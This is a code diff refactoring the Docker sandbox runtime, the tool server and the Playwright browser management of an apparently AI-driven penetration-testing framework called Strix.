elif env_var.startswith("TOOL_SERVER_TOKEN="):
|
||||
self._tool_server_token = env_var.split("=")[1]
|
||||
|
||||
logger.info(f"Found existing container by label for scan {scan_id}")
|
||||
self._recover_container_state(container)
|
||||
return container
|
||||
except (DockerException, RequestsConnectionError, RequestsTimeout) as e:
|
||||
logger.warning("Failed to find existing container by label for scan %s: %s", scan_id, e)
|
||||
except DockerException:
|
||||
pass
|
||||
|
||||
logger.info("Creating new Docker container for scan %s", scan_id)
|
||||
return self._create_container_with_retry(scan_id)
|
||||
|
||||
def _initialize_container(
|
||||
self, container: Container, caido_port: int, tool_server_port: int, tool_server_token: str
|
||||
) -> None:
|
||||
logger.info("Initializing Caido proxy on port %s", caido_port)
|
||||
self._exec_run_with_timeout(
|
||||
container,
|
||||
f"bash -c 'export CAIDO_PORT={caido_port} && /usr/local/bin/docker-entrypoint.sh true'",
|
||||
detach=False,
|
||||
)
|
||||
|
||||
time.sleep(5)
|
||||
|
||||
result = self._exec_run_with_timeout(
|
||||
container,
|
||||
"bash -c 'source /etc/profile.d/proxy.sh && echo $CAIDO_API_TOKEN'",
|
||||
user="pentester",
|
||||
)
|
||||
caido_token = result.output.decode().strip() if result.exit_code == 0 else ""
|
||||
|
||||
container.exec_run(
|
||||
f"bash -c 'source /etc/profile.d/proxy.sh && cd /app && "
|
||||
f"STRIX_SANDBOX_MODE=true CAIDO_API_TOKEN={caido_token} CAIDO_PORT={caido_port} "
|
||||
f"poetry run python strix/runtime/tool_server.py --token {tool_server_token} "
|
||||
f"--host 0.0.0.0 --port {tool_server_port} &'",
|
||||
detach=True,
|
||||
user="pentester",
|
||||
)
|
||||
|
||||
time.sleep(2)
|
||||
|
||||
host = self._resolve_docker_host()
|
||||
health_url = f"http://{host}:{tool_server_port}/health"
|
||||
self._wait_for_tool_server_health(health_url)
|
||||
|
||||
def _wait_for_tool_server_health(
|
||||
self,
|
||||
health_url: str,
|
||||
max_retries: int = TOOL_SERVER_HEALTH_RETRIES,
|
||||
request_timeout: int = TOOL_SERVER_HEALTH_REQUEST_TIMEOUT,
|
||||
) -> None:
|
||||
import httpx
|
||||
|
||||
logger.info(f"Waiting for tool server health at {health_url}")
|
||||
|
||||
for attempt in range(max_retries):
|
||||
try:
|
||||
with httpx.Client(trust_env=False, timeout=request_timeout) as client:
|
||||
response = client.get(health_url)
|
||||
response.raise_for_status()
|
||||
health_data = response.json()
|
||||
|
||||
if health_data.get("status") == "healthy":
|
||||
logger.info(
|
||||
f"Tool server is healthy after {attempt + 1} attempt(s): {health_data}"
|
||||
)
|
||||
return
|
||||
|
||||
logger.warning(f"Tool server returned unexpected status: {health_data}")
|
||||
|
||||
except httpx.ConnectError:
|
||||
logger.debug(
|
||||
f"Tool server not ready (attempt {attempt + 1}/{max_retries}): "
|
||||
f"Connection refused"
|
||||
)
|
||||
except httpx.TimeoutException:
|
||||
logger.debug(
|
||||
f"Tool server not ready (attempt {attempt + 1}/{max_retries}): "
|
||||
f"Request timed out"
|
||||
)
|
||||
except (httpx.RequestError, httpx.HTTPStatusError) as e:
|
||||
logger.debug(f"Tool server not ready (attempt {attempt + 1}/{max_retries}): {e}")
|
||||
|
||||
sleep_time = min(2**attempt * 0.5, 5)
|
||||
time.sleep(sleep_time)
|
||||
|
||||
raise SandboxInitializationError(
|
||||
"Tool server failed to start",
|
||||
"Please ensure Docker Desktop is installed and running, and try running strix again.",
|
||||
)
|
||||
return self._create_container(scan_id)
|
||||
|
||||
def _copy_local_directory_to_container(
|
||||
self, container: Container, local_path: str, target_name: str | None = None
|
||||
@@ -367,17 +216,8 @@ class DockerRuntime(AbstractRuntime):
|
||||
try:
|
||||
local_path_obj = Path(local_path).resolve()
|
||||
if not local_path_obj.exists() or not local_path_obj.is_dir():
|
||||
logger.warning(f"Local path does not exist or is not directory: {local_path_obj}")
|
||||
return
|
||||
|
||||
if target_name:
|
||||
logger.info(
|
||||
f"Copying local directory {local_path_obj} to container at "
|
||||
f"/workspace/{target_name}"
|
||||
)
|
||||
else:
|
||||
logger.info(f"Copying local directory {local_path_obj} to container")
|
||||
|
||||
tar_buffer = BytesIO()
|
||||
with tarfile.open(fileobj=tar_buffer, mode="w") as tar:
|
||||
for item in local_path_obj.rglob("*"):
|
||||
@@ -388,16 +228,12 @@ class DockerRuntime(AbstractRuntime):
|
||||
|
||||
tar_buffer.seek(0)
|
||||
container.put_archive("/workspace", tar_buffer.getvalue())
|
||||
|
||||
container.exec_run(
|
||||
"chown -R pentester:pentester /workspace && chmod -R 755 /workspace",
|
||||
user="root",
|
||||
)
|
||||
|
||||
logger.info("Successfully copied local directory to /workspace")
|
||||
|
||||
except (OSError, DockerException):
|
||||
logger.exception("Failed to copy local directory to container")
|
||||
pass
|
||||
|
||||
async def create_sandbox(
|
||||
self,
|
||||
@@ -406,7 +242,7 @@ class DockerRuntime(AbstractRuntime):
|
||||
local_sources: list[dict[str, str]] | None = None,
|
||||
) -> SandboxInfo:
|
||||
scan_id = self._get_scan_id(agent_id)
|
||||
container = self._get_or_create_scan_container(scan_id)
|
||||
container = self._get_or_create_container(scan_id)
|
||||
|
||||
source_copied_key = f"_source_copied_{scan_id}"
|
||||
if local_sources and not hasattr(self, source_copied_key):
|
||||
@@ -414,40 +250,33 @@ class DockerRuntime(AbstractRuntime):
|
||||
source_path = source.get("source_path")
|
||||
if not source_path:
|
||||
continue
|
||||
|
||||
target_name = source.get("workspace_subdir")
|
||||
if not target_name:
|
||||
target_name = Path(source_path).name or f"target_{index}"
|
||||
|
||||
target_name = (
|
||||
source.get("workspace_subdir") or Path(source_path).name or f"target_{index}"
|
||||
)
|
||||
self._copy_local_directory_to_container(container, source_path, target_name)
|
||||
setattr(self, source_copied_key, True)
|
||||
|
||||
container_id = container.id
|
||||
if container_id is None:
|
||||
if container.id is None:
|
||||
raise RuntimeError("Docker container ID is unexpectedly None")
|
||||
|
||||
token = existing_token if existing_token is not None else self._tool_server_token
|
||||
|
||||
token = existing_token or self._tool_server_token
|
||||
if self._tool_server_port is None or token is None:
|
||||
raise RuntimeError("Tool server not initialized or no token available")
|
||||
raise RuntimeError("Tool server not initialized")
|
||||
|
||||
api_url = await self.get_sandbox_url(container_id, self._tool_server_port)
|
||||
host = self._resolve_docker_host()
|
||||
api_url = f"http://{host}:{self._tool_server_port}"
|
||||
|
||||
await self._register_agent_with_tool_server(api_url, agent_id, token)
|
||||
await self._register_agent(api_url, agent_id, token)
|
||||
|
||||
return {
|
||||
"workspace_id": container_id,
|
||||
"workspace_id": container.id,
|
||||
"api_url": api_url,
|
||||
"auth_token": token,
|
||||
"tool_server_port": self._tool_server_port,
|
||||
"agent_id": agent_id,
|
||||
}
|
||||
|
||||
async def _register_agent_with_tool_server(
|
||||
self, api_url: str, agent_id: str, token: str
|
||||
) -> None:
|
||||
import httpx
|
||||
|
||||
async def _register_agent(self, api_url: str, agent_id: str, token: str) -> None:
|
||||
try:
|
||||
async with httpx.AsyncClient(trust_env=False) as client:
|
||||
response = await client.post(
|
||||
@@ -457,54 +286,33 @@ class DockerRuntime(AbstractRuntime):
|
||||
timeout=30,
|
||||
)
|
||||
response.raise_for_status()
|
||||
logger.info(f"Registered agent {agent_id} with tool server")
|
||||
except (httpx.RequestError, httpx.HTTPStatusError) as e:
|
||||
logger.warning(f"Failed to register agent {agent_id}: {e}")
|
||||
except httpx.RequestError:
|
||||
pass
|
||||
|
||||
async def get_sandbox_url(self, container_id: str, port: int) -> str:
|
||||
try:
|
||||
container = self.client.containers.get(container_id)
|
||||
container.reload()
|
||||
|
||||
host = self._resolve_docker_host()
|
||||
|
||||
self.client.containers.get(container_id)
|
||||
return f"http://{self._resolve_docker_host()}:{port}"
|
||||
except NotFound:
|
||||
raise ValueError(f"Container {container_id} not found.") from None
|
||||
except DockerException as e:
|
||||
raise RuntimeError(f"Failed to get container URL for {container_id}: {e}") from e
|
||||
else:
|
||||
return f"http://{host}:{port}"
|
||||
|
||||
def _resolve_docker_host(self) -> str:
|
||||
docker_host = os.getenv("DOCKER_HOST", "")
|
||||
if not docker_host:
|
||||
return "127.0.0.1"
|
||||
|
||||
from urllib.parse import urlparse
|
||||
|
||||
parsed = urlparse(docker_host)
|
||||
|
||||
if parsed.scheme in ("tcp", "http", "https") and parsed.hostname:
|
||||
return parsed.hostname
|
||||
if docker_host:
|
||||
from urllib.parse import urlparse
|
||||
|
||||
parsed = urlparse(docker_host)
|
||||
if parsed.scheme in ("tcp", "http", "https") and parsed.hostname:
|
||||
return parsed.hostname
|
||||
return "127.0.0.1"
|
||||
|
||||
def _get_extra_hosts(self) -> dict[str, str]:
|
||||
return {HOST_GATEWAY_HOSTNAME: "host-gateway"}
|
||||
|
||||
async def destroy_sandbox(self, container_id: str) -> None:
|
||||
logger.info("Destroying scan container %s", container_id)
|
||||
try:
|
||||
container = self.client.containers.get(container_id)
|
||||
container.stop()
|
||||
container.remove()
|
||||
logger.info("Successfully destroyed container %s", container_id)
|
||||
|
||||
self._scan_container = None
|
||||
self._tool_server_port = None
|
||||
self._tool_server_token = None
|
||||
|
||||
except NotFound:
|
||||
logger.warning("Container %s not found for destruction.", container_id)
|
||||
except DockerException as e:
|
||||
logger.warning("Failed to destroy container %s: %s", container_id, e)
|
||||
except (NotFound, DockerException):
|
||||
pass
|
||||
|
||||
@@ -2,11 +2,9 @@ from __future__ import annotations
|
||||
|
||||
import argparse
|
||||
import asyncio
|
||||
import logging
|
||||
import os
|
||||
import signal
|
||||
import sys
|
||||
from multiprocessing import Process, Queue
|
||||
from typing import Any
|
||||
|
||||
import uvicorn
|
||||
@@ -23,17 +21,22 @@ parser = argparse.ArgumentParser(description="Start Strix tool server")
|
||||
parser.add_argument("--token", required=True, help="Authentication token")
|
||||
parser.add_argument("--host", default="0.0.0.0", help="Host to bind to") # nosec
|
||||
parser.add_argument("--port", type=int, required=True, help="Port to bind to")
|
||||
parser.add_argument(
|
||||
"--timeout",
|
||||
type=int,
|
||||
default=120,
|
||||
help="Hard timeout in seconds for each request execution (default: 120)",
|
||||
)
|
||||
|
||||
args = parser.parse_args()
|
||||
EXPECTED_TOKEN = args.token
|
||||
REQUEST_TIMEOUT = args.timeout
|
||||
|
||||
app = FastAPI()
|
||||
security = HTTPBearer()
|
||||
|
||||
security_dependency = Depends(security)
|
||||
|
||||
agent_processes: dict[str, dict[str, Any]] = {}
|
||||
agent_queues: dict[str, dict[str, Queue[Any]]] = {}
|
||||
agent_tasks: dict[str, asyncio.Task[Any]] = {}
|
||||
|
||||
|
||||
def verify_token(credentials: HTTPAuthorizationCredentials) -> str:
|
||||
@@ -65,60 +68,19 @@ class ToolExecutionResponse(BaseModel):
|
||||
error: str | None = None
|
||||
|
||||
|
||||
def agent_worker(_agent_id: str, request_queue: Queue[Any], response_queue: Queue[Any]) -> None:
|
||||
null_handler = logging.NullHandler()
|
||||
|
||||
root_logger = logging.getLogger()
|
||||
root_logger.handlers = [null_handler]
|
||||
root_logger.setLevel(logging.CRITICAL)
|
||||
|
||||
from strix.tools.argument_parser import ArgumentConversionError, convert_arguments
|
||||
async def _run_tool(agent_id: str, tool_name: str, kwargs: dict[str, Any]) -> Any:
|
||||
from strix.tools.argument_parser import convert_arguments
|
||||
from strix.tools.context import set_current_agent_id
|
||||
from strix.tools.registry import get_tool_by_name
|
||||
|
||||
while True:
|
||||
try:
|
||||
request = request_queue.get()
|
||||
set_current_agent_id(agent_id)
|
||||
|
||||
if request is None:
|
||||
break
|
||||
tool_func = get_tool_by_name(tool_name)
|
||||
if not tool_func:
|
||||
raise ValueError(f"Tool '{tool_name}' not found")
|
||||
|
||||
tool_name = request["tool_name"]
|
||||
kwargs = request["kwargs"]
|
||||
|
||||
try:
|
||||
tool_func = get_tool_by_name(tool_name)
|
||||
if not tool_func:
|
||||
response_queue.put({"error": f"Tool '{tool_name}' not found"})
|
||||
continue
|
||||
|
||||
converted_kwargs = convert_arguments(tool_func, kwargs)
|
||||
result = tool_func(**converted_kwargs)
|
||||
|
||||
response_queue.put({"result": result})
|
||||
|
||||
except (ArgumentConversionError, ValidationError) as e:
|
||||
response_queue.put({"error": f"Invalid arguments: {e}"})
|
||||
except (RuntimeError, ValueError, ImportError) as e:
|
||||
response_queue.put({"error": f"Tool execution error: {e}"})
|
||||
|
||||
except (RuntimeError, ValueError, ImportError) as e:
|
||||
response_queue.put({"error": f"Worker error: {e}"})
|
||||
|
||||
|
||||
def ensure_agent_process(agent_id: str) -> tuple[Queue[Any], Queue[Any]]:
|
||||
if agent_id not in agent_processes:
|
||||
request_queue: Queue[Any] = Queue()
|
||||
response_queue: Queue[Any] = Queue()
|
||||
|
||||
process = Process(
|
||||
target=agent_worker, args=(agent_id, request_queue, response_queue), daemon=True
|
||||
)
|
||||
process.start()
|
||||
|
||||
agent_processes[agent_id] = {"process": process, "pid": process.pid}
|
||||
agent_queues[agent_id] = {"request": request_queue, "response": response_queue}
|
||||
|
||||
return agent_queues[agent_id]["request"], agent_queues[agent_id]["response"]
|
||||
converted_kwargs = convert_arguments(tool_func, kwargs)
|
||||
return await asyncio.to_thread(tool_func, **converted_kwargs)
|
||||
|
||||
|
||||
@app.post("/execute", response_model=ToolExecutionResponse)
|
||||
@@ -127,20 +89,42 @@ async def execute_tool(
|
||||
) -> ToolExecutionResponse:
|
||||
verify_token(credentials)
|
||||
|
||||
request_queue, response_queue = ensure_agent_process(request.agent_id)
|
||||
agent_id = request.agent_id
|
||||
|
||||
request_queue.put({"tool_name": request.tool_name, "kwargs": request.kwargs})
|
||||
if agent_id in agent_tasks:
|
||||
old_task = agent_tasks[agent_id]
|
||||
if not old_task.done():
|
||||
old_task.cancel()
|
||||
|
||||
task = asyncio.create_task(
|
||||
asyncio.wait_for(
|
||||
_run_tool(agent_id, request.tool_name, request.kwargs), timeout=REQUEST_TIMEOUT
|
||||
)
|
||||
)
|
||||
agent_tasks[agent_id] = task
|
||||
|
||||
try:
|
||||
loop = asyncio.get_event_loop()
|
||||
response = await loop.run_in_executor(None, response_queue.get)
|
||||
result = await task
|
||||
return ToolExecutionResponse(result=result)
|
||||
|
||||
if "error" in response:
|
||||
return ToolExecutionResponse(error=response["error"])
|
||||
return ToolExecutionResponse(result=response.get("result"))
|
||||
except asyncio.CancelledError:
|
||||
return ToolExecutionResponse(error="Cancelled by newer request")
|
||||
|
||||
except (RuntimeError, ValueError, OSError) as e:
|
||||
return ToolExecutionResponse(error=f"Worker error: {e}")
|
||||
except TimeoutError:
|
||||
return ToolExecutionResponse(error=f"Tool timed out after {REQUEST_TIMEOUT}s")
|
||||
|
||||
except ValidationError as e:
|
||||
return ToolExecutionResponse(error=f"Invalid arguments: {e}")
|
||||
|
||||
except (ValueError, RuntimeError, ImportError) as e:
|
||||
return ToolExecutionResponse(error=f"Tool execution error: {e}")
|
||||
|
||||
except Exception as e: # noqa: BLE001
|
||||
return ToolExecutionResponse(error=f"Unexpected error: {e}")
|
||||
|
||||
finally:
|
||||
if agent_tasks.get(agent_id) is task:
|
||||
del agent_tasks[agent_id]
|
||||
|
||||
|
||||
@app.post("/register_agent")
|
||||
@@ -148,8 +132,6 @@ async def register_agent(
|
||||
agent_id: str, credentials: HTTPAuthorizationCredentials = security_dependency
|
||||
) -> dict[str, str]:
|
||||
verify_token(credentials)
|
||||
|
||||
ensure_agent_process(agent_id)
|
||||
return {"status": "registered", "agent_id": agent_id}
|
||||
|
||||
|
||||
@@ -160,35 +142,16 @@ async def health_check() -> dict[str, Any]:
|
||||
"sandbox_mode": str(SANDBOX_MODE),
|
||||
"environment": "sandbox" if SANDBOX_MODE else "main",
|
||||
"auth_configured": "true" if EXPECTED_TOKEN else "false",
|
||||
"active_agents": len(agent_processes),
|
||||
"agents": list(agent_processes.keys()),
|
||||
"active_agents": len(agent_tasks),
|
||||
"agents": list(agent_tasks.keys()),
|
||||
}
|
||||
|
||||
|
||||
def cleanup_all_agents() -> None:
|
||||
for agent_id in list(agent_processes.keys()):
|
||||
try:
|
||||
agent_queues[agent_id]["request"].put(None)
|
||||
process = agent_processes[agent_id]["process"]
|
||||
|
||||
process.join(timeout=1)
|
||||
|
||||
if process.is_alive():
|
||||
process.terminate()
|
||||
process.join(timeout=1)
|
||||
|
||||
if process.is_alive():
|
||||
process.kill()
|
||||
|
||||
except (BrokenPipeError, EOFError, OSError):
|
||||
pass
|
||||
except (RuntimeError, ValueError) as e:
|
||||
logging.getLogger(__name__).debug(f"Error during agent cleanup: {e}")
|
||||
|
||||
|
||||
def signal_handler(_signum: int, _frame: Any) -> None:
|
||||
signal.signal(signal.SIGPIPE, signal.SIG_IGN) if hasattr(signal, "SIGPIPE") else None
|
||||
cleanup_all_agents()
|
||||
if hasattr(signal, "SIGPIPE"):
|
||||
signal.signal(signal.SIGPIPE, signal.SIG_IGN)
|
||||
for task in agent_tasks.values():
|
||||
task.cancel()
|
||||
sys.exit(0)
|
||||
|
||||
|
||||
@@ -199,7 +162,4 @@ signal.signal(signal.SIGTERM, signal_handler)
|
||||
signal.signal(signal.SIGINT, signal_handler)
|
||||
|
||||
if __name__ == "__main__":
|
||||
try:
|
||||
uvicorn.run(app, host=args.host, port=args.port, log_level="info")
|
||||
finally:
|
||||
cleanup_all_agents()
|
||||
uvicorn.run(app, host=args.host, port=args.port, log_level="info")
|
||||
|
||||
@@ -1,4 +1,3 @@
|
||||
<?xml version="1.0" ?>
|
||||
<tools>
|
||||
<tool name="browser_action">
|
||||
<description>Perform browser actions using a Playwright-controlled browser with multiple tabs.
|
||||
@@ -92,6 +91,12 @@
|
||||
code normally. It can be single line or multi-line.
|
||||
13. For form filling, click on the field first, then use 'type' to enter text.
|
||||
14. The browser runs in headless mode using Chrome engine for security and performance.
|
||||
15. RESOURCE MANAGEMENT:
|
||||
- ALWAYS close tabs you no longer need using 'close_tab' action.
|
||||
- ALWAYS close the browser with 'close' action when you have completely finished
|
||||
all browser-related tasks. Do not leave the browser running if you're done with it.
|
||||
- If you opened multiple tabs, close them as soon as you've extracted the needed
|
||||
information from each one.
|
||||
</notes>
|
||||
<examples>
|
||||
# Launch browser at URL (creates tab_1)
|
||||
|
||||
@@ -1,5 +1,6 @@
|
||||
import asyncio
|
||||
import base64
|
||||
import contextlib
|
||||
import logging
|
||||
import threading
|
||||
from pathlib import Path
|
||||
@@ -17,13 +18,82 @@ MAX_CONSOLE_LOGS_COUNT = 200
|
||||
MAX_JS_RESULT_LENGTH = 5_000
|
||||
|
||||
|
||||
class _BrowserState:
|
||||
"""Singleton state for the shared browser instance."""
|
||||
|
||||
lock = threading.Lock()
|
||||
event_loop: asyncio.AbstractEventLoop | None = None
|
||||
event_loop_thread: threading.Thread | None = None
|
||||
playwright: Playwright | None = None
|
||||
browser: Browser | None = None
|
||||
|
||||
|
||||
_state = _BrowserState()
|
||||
|
||||
|
||||
def _ensure_event_loop() -> None:
|
||||
if _state.event_loop is not None:
|
||||
return
|
||||
|
||||
def run_loop() -> None:
|
||||
_state.event_loop = asyncio.new_event_loop()
|
||||
asyncio.set_event_loop(_state.event_loop)
|
||||
_state.event_loop.run_forever()
|
||||
|
||||
_state.event_loop_thread = threading.Thread(target=run_loop, daemon=True)
|
||||
_state.event_loop_thread.start()
|
||||
|
||||
while _state.event_loop is None:
|
||||
threading.Event().wait(0.01)
|
||||
|
||||
|
||||
async def _create_browser() -> Browser:
|
||||
if _state.browser is not None and _state.browser.is_connected():
|
||||
return _state.browser
|
||||
|
||||
if _state.browser is not None:
|
||||
with contextlib.suppress(Exception):
|
||||
await _state.browser.close()
|
||||
_state.browser = None
|
||||
if _state.playwright is not None:
|
||||
with contextlib.suppress(Exception):
|
||||
await _state.playwright.stop()
|
||||
_state.playwright = None
|
||||
|
||||
_state.playwright = await async_playwright().start()
|
||||
_state.browser = await _state.playwright.chromium.launch(
|
||||
headless=True,
|
||||
args=[
|
||||
"--no-sandbox",
|
||||
"--disable-dev-shm-usage",
|
||||
"--disable-gpu",
|
||||
"--disable-web-security",
|
||||
],
|
||||
)
|
||||
return _state.browser
|
||||
|
||||
|
||||
def _get_browser() -> tuple[asyncio.AbstractEventLoop, Browser]:
|
||||
with _state.lock:
|
||||
_ensure_event_loop()
|
||||
assert _state.event_loop is not None
|
||||
|
||||
if _state.browser is None or not _state.browser.is_connected():
|
||||
future = asyncio.run_coroutine_threadsafe(_create_browser(), _state.event_loop)
|
||||
future.result(timeout=30)
|
||||
|
||||
assert _state.browser is not None
|
||||
return _state.event_loop, _state.browser
|
||||
|
||||
|
||||
class BrowserInstance:
|
||||
def __init__(self) -> None:
|
||||
self.is_running = True
|
||||
self._execution_lock = threading.Lock()
|
||||
|
||||
self.playwright: Playwright | None = None
|
||||
self.browser: Browser | None = None
|
||||
self._loop: asyncio.AbstractEventLoop | None = None
|
||||
self._browser: Browser | None = None
|
||||
|
||||
self.context: BrowserContext | None = None
|
||||
self.pages: dict[str, Page] = {}
|
||||
self.current_page_id: str | None = None
|
||||
@@ -31,23 +101,6 @@ class BrowserInstance:
|
||||
|
||||
self.console_logs: dict[str, list[dict[str, Any]]] = {}
|
||||
|
||||
self._loop: asyncio.AbstractEventLoop | None = None
|
||||
self._loop_thread: threading.Thread | None = None
|
||||
|
||||
self._start_event_loop()
|
||||
|
||||
def _start_event_loop(self) -> None:
|
||||
def run_loop() -> None:
|
||||
self._loop = asyncio.new_event_loop()
|
||||
asyncio.set_event_loop(self._loop)
|
||||
self._loop.run_forever()
|
||||
|
||||
self._loop_thread = threading.Thread(target=run_loop, daemon=True)
|
||||
self._loop_thread.start()
|
||||
|
||||
while self._loop is None:
|
||||
threading.Event().wait(0.01)
|
||||
|
||||
def _run_async(self, coro: Any) -> dict[str, Any]:
|
||||
if not self._loop or not self.is_running:
|
||||
raise RuntimeError("Browser instance is not running")
|
||||
@@ -77,21 +130,10 @@ class BrowserInstance:
|
||||
|
||||
page.on("console", handle_console)
|
||||
|
||||
async def _launch_browser(self, url: str | None = None) -> dict[str, Any]:
|
||||
self.playwright = await async_playwright().start()
|
||||
async def _create_context(self, url: str | None = None) -> dict[str, Any]:
|
||||
assert self._browser is not None
|
||||
|
||||
self.browser = await self.playwright.chromium.launch(
|
||||
headless=True,
|
||||
args=[
|
||||
"--no-sandbox",
|
||||
"--disable-dev-shm-usage",
|
||||
"--disable-gpu",
|
||||
"--disable-web-security",
|
||||
"--disable-features=VizDisplayCompositor",
|
||||
],
|
||||
)
|
||||
|
||||
self.context = await self.browser.new_context(
|
||||
self.context = await self._browser.new_context(
|
||||
viewport={"width": 1280, "height": 720},
|
||||
user_agent=(
|
||||
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
|
||||
@@ -148,10 +190,11 @@ class BrowserInstance:
|
||||
|
||||
def launch(self, url: str | None = None) -> dict[str, Any]:
|
||||
with self._execution_lock:
|
||||
if self.browser is not None:
|
||||
if self.context is not None:
|
||||
raise ValueError("Browser is already launched")
|
||||
|
||||
return self._run_async(self._launch_browser(url))
|
||||
self._loop, self._browser = _get_browser()
|
||||
return self._run_async(self._create_context(url))
|
||||
|
||||
def goto(self, url: str, tab_id: str | None = None) -> dict[str, Any]:
|
||||
with self._execution_lock:
|
||||
@@ -512,22 +555,27 @@ class BrowserInstance:
|
||||
def close(self) -> None:
|
||||
with self._execution_lock:
|
||||
self.is_running = False
|
||||
if self._loop:
|
||||
asyncio.run_coroutine_threadsafe(self._close_browser(), self._loop)
|
||||
if self._loop and self.context:
|
||||
future = asyncio.run_coroutine_threadsafe(self._close_context(), self._loop)
|
||||
with contextlib.suppress(Exception):
|
||||
future.result(timeout=5)
|
||||
|
||||
self._loop.call_soon_threadsafe(self._loop.stop)
|
||||
self.pages.clear()
|
||||
self.console_logs.clear()
|
||||
self.current_page_id = None
|
||||
self.context = None
|
||||
|
||||
if self._loop_thread:
|
||||
self._loop_thread.join(timeout=5)
|
||||
|
||||
async def _close_browser(self) -> None:
|
||||
async def _close_context(self) -> None:
|
||||
try:
|
||||
if self.browser:
|
||||
await self.browser.close()
|
||||
if self.playwright:
|
||||
await self.playwright.stop()
|
||||
if self.context:
|
||||
await self.context.close()
|
||||
except (OSError, RuntimeError) as e:
|
||||
logger.warning(f"Error closing browser: {e}")
|
||||
logger.warning(f"Error closing context: {e}")
|
||||
|
||||
def is_alive(self) -> bool:
|
||||
return self.is_running and self.browser is not None and self.browser.is_connected()
|
||||
return (
|
||||
self.is_running
|
||||
and self.context is not None
|
||||
and self._browser is not None
|
||||
and self._browser.is_connected()
|
||||
)
|
||||
|
||||
@@ -1,43 +1,56 @@
|
||||
import atexit
|
||||
import contextlib
|
||||
import signal
|
||||
import sys
|
||||
import threading
|
||||
from typing import Any
|
||||
|
||||
from strix.tools.context import get_current_agent_id
|
||||
|
||||
from .browser_instance import BrowserInstance
|
||||
|
||||
|
||||
class BrowserTabManager:
|
||||
def __init__(self) -> None:
|
||||
self.browser_instance: BrowserInstance | None = None
|
||||
self._browsers_by_agent: dict[str, BrowserInstance] = {}
|
||||
self._lock = threading.Lock()
|
||||
|
||||
self._register_cleanup_handlers()
|
||||
|
||||
def _get_agent_browser(self) -> BrowserInstance | None:
|
||||
agent_id = get_current_agent_id()
|
||||
with self._lock:
|
||||
return self._browsers_by_agent.get(agent_id)
|
||||
|
||||
def _set_agent_browser(self, browser: BrowserInstance | None) -> None:
|
||||
agent_id = get_current_agent_id()
|
||||
with self._lock:
|
||||
if browser is None:
|
||||
self._browsers_by_agent.pop(agent_id, None)
|
||||
else:
|
||||
self._browsers_by_agent[agent_id] = browser
|
||||
|
||||
def launch_browser(self, url: str | None = None) -> dict[str, Any]:
|
||||
with self._lock:
|
||||
if self.browser_instance is not None:
|
||||
agent_id = get_current_agent_id()
|
||||
if agent_id in self._browsers_by_agent:
|
||||
raise ValueError("Browser is already launched")
|
||||
|
||||
try:
|
||||
self.browser_instance = BrowserInstance()
|
||||
result = self.browser_instance.launch(url)
|
||||
browser = BrowserInstance()
|
||||
result = browser.launch(url)
|
||||
self._browsers_by_agent[agent_id] = browser
|
||||
result["message"] = "Browser launched successfully"
|
||||
except (OSError, ValueError, RuntimeError) as e:
|
||||
if self.browser_instance:
|
||||
self.browser_instance = None
|
||||
raise RuntimeError(f"Failed to launch browser: {e}") from e
|
||||
else:
|
||||
return result
|
||||
|
||||
def goto_url(self, url: str, tab_id: str | None = None) -> dict[str, Any]:
|
||||
with self._lock:
|
||||
if self.browser_instance is None:
|
||||
raise ValueError("Browser not launched")
|
||||
browser = self._get_agent_browser()
|
||||
if browser is None:
|
||||
raise ValueError("Browser not launched")
|
||||
|
||||
try:
|
||||
result = self.browser_instance.goto(url, tab_id)
|
||||
result = browser.goto(url, tab_id)
|
||||
result["message"] = f"Navigated to {url}"
|
||||
except (OSError, ValueError, RuntimeError) as e:
|
||||
raise RuntimeError(f"Failed to navigate to URL: {e}") from e
|
||||
@@ -45,12 +58,12 @@ class BrowserTabManager:
|
||||
return result
|
||||
|
||||
def click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
|
||||
with self._lock:
|
||||
if self.browser_instance is None:
|
||||
raise ValueError("Browser not launched")
|
||||
browser = self._get_agent_browser()
|
||||
if browser is None:
|
||||
raise ValueError("Browser not launched")
|
||||
|
||||
try:
|
||||
result = self.browser_instance.click(coordinate, tab_id)
|
||||
result = browser.click(coordinate, tab_id)
|
||||
result["message"] = f"Clicked at {coordinate}"
|
||||
except (OSError, ValueError, RuntimeError) as e:
|
||||
raise RuntimeError(f"Failed to click: {e}") from e
|
||||
@@ -58,12 +71,12 @@ class BrowserTabManager:
|
||||
return result
|
||||
|
||||
def type_text(self, text: str, tab_id: str | None = None) -> dict[str, Any]:
|
||||
with self._lock:
|
||||
if self.browser_instance is None:
|
||||
raise ValueError("Browser not launched")
|
||||
browser = self._get_agent_browser()
|
||||
if browser is None:
|
||||
raise ValueError("Browser not launched")
|
||||
|
||||
try:
|
||||
result = self.browser_instance.type_text(text, tab_id)
|
||||
result = browser.type_text(text, tab_id)
|
||||
result["message"] = f"Typed text: {text[:50]}{'...' if len(text) > 50 else ''}"
|
||||
except (OSError, ValueError, RuntimeError) as e:
|
||||
raise RuntimeError(f"Failed to type text: {e}") from e
|
||||
@@ -71,12 +84,12 @@ class BrowserTabManager:
|
||||
return result
|
||||
|
||||
def scroll(self, direction: str, tab_id: str | None = None) -> dict[str, Any]:
|
||||
with self._lock:
|
||||
if self.browser_instance is None:
|
||||
raise ValueError("Browser not launched")
|
||||
browser = self._get_agent_browser()
|
||||
if browser is None:
|
||||
raise ValueError("Browser not launched")
|
||||
|
||||
try:
|
||||
result = self.browser_instance.scroll(direction, tab_id)
|
||||
result = browser.scroll(direction, tab_id)
|
||||
result["message"] = f"Scrolled {direction}"
|
||||
except (OSError, ValueError, RuntimeError) as e:
|
||||
raise RuntimeError(f"Failed to scroll: {e}") from e
|
||||
@@ -84,12 +97,12 @@ class BrowserTabManager:
|
||||
return result
|
||||
|
||||
def back(self, tab_id: str | None = None) -> dict[str, Any]:
|
||||
with self._lock:
|
||||
if self.browser_instance is None:
|
||||
raise ValueError("Browser not launched")
|
||||
browser = self._get_agent_browser()
|
||||
if browser is None:
|
||||
raise ValueError("Browser not launched")
|
||||
|
||||
try:
|
||||
result = self.browser_instance.back(tab_id)
|
||||
result = browser.back(tab_id)
|
||||
result["message"] = "Navigated back"
|
||||
except (OSError, ValueError, RuntimeError) as e:
|
||||
raise RuntimeError(f"Failed to go back: {e}") from e
|
||||
@@ -97,12 +110,12 @@ class BrowserTabManager:
|
||||
return result
|
||||
|
||||
def forward(self, tab_id: str | None = None) -> dict[str, Any]:
|
||||
with self._lock:
|
||||
if self.browser_instance is None:
|
||||
raise ValueError("Browser not launched")
|
||||
browser = self._get_agent_browser()
|
||||
